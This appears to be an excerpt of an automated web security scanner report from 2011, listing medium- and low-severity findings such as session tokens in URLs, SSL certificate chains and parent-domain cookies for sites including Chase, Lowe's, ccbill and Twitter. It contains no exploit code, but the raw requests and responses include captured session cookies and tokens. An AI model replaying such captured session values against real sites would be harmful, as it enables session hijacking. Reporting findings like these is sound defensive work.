Cookie: hiab=nnascar; __qca=P0-1347206192-1310503617547

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://blog.katango.com/xmlrpc.php
Link: <http://wp.me/p1Alwm-6p>; rel=shortlink
Content-Length: 31215

<!DOCTYPE html>
<!--[if IE 6]>
<html id="ie6" dir="ltr" lang="en">
<![endif]-->
<!--[if IE 8]>
<html id="ie8" dir="ltr" lang="en">
<![endif]-->
<!--[if (!IE)]><!-->
<html dir="ltr" lang="en">
<!--<![e
...[SNIP]...
<div id="wpl-button"><a href='http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/?like=1&amp;_wpnonce=e687d1efc9' title='I like this post' class='like needs-login' rel='nofollow'><span>
...[SNIP]...

8.3. http://fls.doubleclick.net/activityi

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=2996&token=LOW21

This is the same token=LOW21 value flagged in 8.1, embedded in the tracking-pixel markup returned by the Floodlight server; it is a static advertiser tag, not a session token.

Request

GET /activityi;src=1160694;type=lowes714;cat=homep272;ord=1;num=7992032719776.034? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 12 Jul 2011 21:30:49 GMT
Expires: Tue, 12 Jul 2011 21:30:49 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 455
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=2996&token=LOW21" width="1" height="1" border="0">    <img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=lowesz_cs=1&betq=13252=436547" width = "1" height = "1" border = "0">
...[SNIP]...

8.4. http://gw-services.vtrenz.net/WebCookies/RegisterWebPageVisit.cfm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://gw-services.vtrenz.net
Path:   /WebCookies/RegisterWebPageVisit.cfm

Issue detail

The URL in the request appears to contain a session token within the query string:

sessionGUID=01294291-8d37-4c5e-56e4-79da9e81677a
webSyncID=14653cc8-09d7-804a-cc8b-04c4bccba599

This request is a page-view beacon sent from trustedcs.com to a third-party tracking service (vtrenz.net); the identifiers are the tracker's own visitor and session GUIDs rather than an authenticated application session, so what is exposed is tracking correlation, not account access.

Request

GET /WebCookies/RegisterWebPageVisit.cfm?accesskey=383ED628-AF06-4463-81DC-7F3477CEDFC3&v=2.02&isNewSession=1&type=pageview&sessionGUID=01294291-8d37-4c5e-56e4-79da9e81677a&webSyncID=14653cc8-09d7-804a-cc8b-04c4bccba599&url=http%3A%2F%2Ftrustedcs.com%2F&hostname=trustedcs.com&pathname=%2F HTTP/1.1
Host: gw-services.vtrenz.net
Proxy-Connection: keep-alive
Referer: http://trustedcs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerb2b-gw-services.vtrenz.net-http=206010378.20480.0000

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 12 Jul 2011 18:09:11 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Content-Length: 0


8.5. https://locator.chase.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://locator.chase.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:08:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=D0ADAAE16A951A07FE1EEAE985EA56B3.ftc-web2; Path=/; Secure
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 43237
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="https://www.chase.com" target="_self" >
   <img src="/images/logo107x20.gif;jsessionid=D0ADAAE16A951A07FE1EEAE985EA56B3.ftc-web2" border="0" id="logo" alt="Chase Home" />
</a>
...[SNIP]...

8.6. https://locator.chase.com/LocatorAction.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://locator.chase.com
Path:   /LocatorAction.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /LocatorAction.do;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:02 GMT
Server: Apache
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 43237
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...

8.7. https://locator.chase.com/LocatorAction.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://locator.chase.com
Path:   /LocatorAction.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /LocatorAction.do;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:02 GMT
Server: Apache
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 43237
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="https://www.chase.com" target="_self" >
   <img src="/images/logo107x20.gif;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4" border="0" id="logo" alt="Chase Home" />
</a>
...[SNIP]...

8.8. https://locator.chase.com/images/logo107x20.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://locator.chase.com
Path:   /images/logo107x20.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/logo107x20.gif;jsessionid=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:08 GMT
Server: Apache
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"1983-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 1983
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89ak...............@@@>>>....y.~~~.z.?...y..............z....///.x.......@.....___.x..x.....z.......ppp.z.......?...z..z..w.=..ooo.......y........x.@.....?..@........A..@............{..y....=...
...[SNIP]...

8.9. https://locator.chase.com/jsp/SearchPage.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://locator.chase.com
Path:   /jsp/SearchPage.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /jsp/SearchPage.jsp HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=23ECC4A4BD991387CE19963C8C5BA577.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:44 GMT
Server: Apache
Set-Cookie: JSESSIONID=E6E7F423B782399ACE6AFDF9C2ECA5B9.ftc-web2; Path=/; Secure
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 43237
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="https://www.chase.com" target="_self" >
   <img src="/images/logo107x20.gif;jsessionid=E6E7F423B782399ACE6AFDF9C2ECA5B9.ftc-web2" border="0" id="logo" alt="Chase Home" />
</a>
...[SNIP]...

8.10. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.akqa.com%2F&callback=_xdc_._txgsed&token=4345 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.akqa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Tue, 12 Jul 2011 15:33:06 GMT
Server: mafe
Cache-Control: private
Content-Length: 37
X-XSS-Protection: 1; mode=block

_xdc_._txgsed && _xdc_._txgsed( [1] )

9. SSL certificate
There are 7 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



9.1. https://store.popcap.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://store.popcap.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  store.popcap.com
Issued by:  DigiCert High Assurance EV CA-1
Valid from:  Thu Sep 02 19:00:00 CDT 2010
Valid to:  Sun Nov 06 17:59:59 CST 2011

Certificate chain #1

Issued to:  DigiCert High Assurance EV CA-1
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Thu Nov 09 18:00:00 CST 2006
Valid to:  Tue Nov 09 18:00:00 CST 2021

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

9.2. https://admin.ccbill.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  admin.ccbill.com
Issued by:  Thawte SSL CA
Valid from:  Tue Dec 07 18:00:00 CST 2010
Valid to:  Thu Jan 12 17:59:59 CST 2012

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

9.3. https://affiliateadmin.ccbill.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://affiliateadmin.ccbill.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  affiliateadmin.ccbill.com
Issued by:  Thawte SSL CA
Valid from:  Sun Dec 05 18:00:00 CST 2010
Valid to:  Thu Dec 15 17:59:59 CST 2011

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

9.4. https://bill.ccbill.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bill.ccbill.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  bill.ccbill.com
Issued by:  Thawte SSL CA
Valid from:  Tue Dec 07 18:00:00 CST 2010
Valid to:  Thu Jan 19 17:59:59 CST 2012

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

9.5. https://support.ccbill.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.ccbill.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  support.ccbill.com
Issued by:  Thawte SSL CA
Valid from:  Sun Aug 15 19:00:00 CDT 2010
Valid to:  Tue Aug 23 18:59:59 CDT 2011

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

9.6. https://www.ccbill.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccbill.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.ccbill.com
Issued by:  Thawte SSL CA
Valid from:  Tue Jul 27 19:00:00 CDT 2010
Valid to:  Thu Aug 04 18:59:59 CDT 2011

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

9.7. https://www.lowes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.lowes.com,ST=North Carolina
Issued by:  Akamai Subordinate CA 3
Valid from:  Mon Sep 13 16:28:46 CDT 2010
Valid to:  Tue Sep 13 16:28:46 CDT 2011

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

10. Cookie scoped to parent domain
There are 44 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://login.dotomi.com/ucm/UCMController

Summary

Severity:   Low
Confidence:   Firm
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_ref=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate%3Fcheck%3D*n%26jspStoreDir%3Dhdus%26contractId%3D2081191%26itemAdd%3Dtrue%26orderId%3D131526257%26quantity%3D1%26catalogId%3D10053%26orderItemId%3D339315499%26langId%3D-1%26URL%3DOrderItemDisplayViewShiptoAssoc%26catEntryId%3D202349118%26storeId%3D10051%26calculationUsageId%3D-1%26calculationUsageId%3D-2%26calculationUsageId%3D-5%26calculationUsageId%3D-6%26calculationUsageId%3D-7%26calculationUsageId%3D-8%26calculationUsageId%3D-9&dtmc_url=http%3A//www6.homedepot.com/how-to/index.html& HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www6.homedepot.com/how-to/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1310488553942310; DotomiRR2339=-1$1$1$; DotomiUser=330100732990473967$0$335422886; DotomiSession_2339=2_371600815342543870$330100732990473967$335422886$1310489049679; DotomiNet=2$DjQqblZ1RHBFAGVVBwt9WgdHKSpAJ24SQR0PVVBLY3Jma1xARWZBXAEPW0dLS0BZYGNTeGNlUHFRLwVZaVwXXjkZDVJ%2BewxzCUIBXmZTVkB0IyQsBAsRWgAbDwY%3D

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:53:44 GMT
X-Name: dmc-o08
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=330100732990473967$0$335422886; Domain=.dotomi.com; Expires=Thu, 11-Jul-2013 16:53:44 GMT; Path=/
Set-Cookie: DotomiSession_2339=2_371600815342543870$330100732990473967$335422886$1310489624594; Domain=.dotomi.com; Path=/
Set-Cookie: DotomiNet=2$DjQqblZ1RHBFAGZZAQZ%2BVAJHKSpAJ24SQR0PVVBLY3Jma1xARWZBXAEPW0dLS0BZYGBffm5mXnRRLwVZaVwXXjkZDVJ%2BewxzCUIBXmZTVkB0IyQsBAsRWgAbDwY%3D; Domain=.dotomi.com; Expires=Thu, 11-Jul-2013 16:53:44 GMT; Path=/
Set-Cookie: DotomiRR2339=-1$1$1$; Domain=.dotomi.com; Expires=Wed, 13-Jul-2011 16:53:44 GMT; Path=/
Content-Type: text/html
Content-Length: 1521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" typ
...[SNIP]...

10.2. http://scribe.twitter.com/scribe

Summary

Severity:   Low
Confidence:   Firm
Host:   http://scribe.twitter.com
Path:   /scribe

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scribe?q=0241&log%5B%5D=%7B%22event_name%22%3A%22subnav%22%2C%22item%22%3A%22tweets%22%2C%22user_id%22%3A0%2C%22page%22%3A%22profile%22%2C%22_category_%22%3A%22webclient%22%2C%22ts%22%3A1310519091845%7D&log%5B%5D=%7B%22event_name%22%3A%22web%3Aprofile%3A%3A%3Aimpression%22%2C%22noob_level%22%3Anull%2C%22internal_referer%22%3Anull%2C%22profile_id%22%3A61504755%2C%22context%22%3A%22profile%22%2C%22user_id%22%3A0%2C%22page%22%3A%22profile%22%2C%22_category_%22%3A%22client_event%22%2C%22ts%22%3A1310519091867%7D&log%5B%5D=%7B%22event_name%22%3A%22stream-view%22%2C%22stream_name%22%3A%22User%22%2C%22user_id%22%3A0%2C%22page%22%3A%22profile%22%2C%22_category_%22%3A%22webclient%22%2C%22ts%22%3A1310519091888%7D HTTP/1.1
Host: scribe.twitter.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A130884465537011414; k=173.193.214.243.1310208653927867; __utma=43838368.1598605414.1305368954.1310393759.1310519089.15; __utmb=43838368.1.10.1310519089; __utmc=43838368; __utmz=43838368.1310519089.15.8.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/cybersecurity/; __utmv=43838368.lang%3A%20en; _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiZodHRwOi8vdHdpdHRlci5jb20vUmhvZGVJc2xh%250AbmRFTUE6D2NyZWF0ZWRfYXRsKwhRUgYhMQE6B2lkIiU2M2Y1MDg3N2RhMTM0%250AODk3YmI1NTYwNDAzNTkyNWE1MzoMY3NyZl9pZCIlYzhlNzI5MTQ0Nzk1YjU0%250ANDhkNjk4YzJkMWFmMzQ1ZmUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--f85f91307c1e2d3da5ae66c2d365ecfdde397c4f

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:05:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310519144-24311-9025
ETag: "db04c7b378cb2db912c3ba8a5a774ee3"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 01:05:44 GMT
Content-Transfer-Encoding: binary
X-Runtime: 0.01606
Content-Disposition: inline
Content-Type: image/gif; charset=utf-8
Content-Length: 43
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: b8a7614452c3d5517e8d7c8394afa4eff3f942eb
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
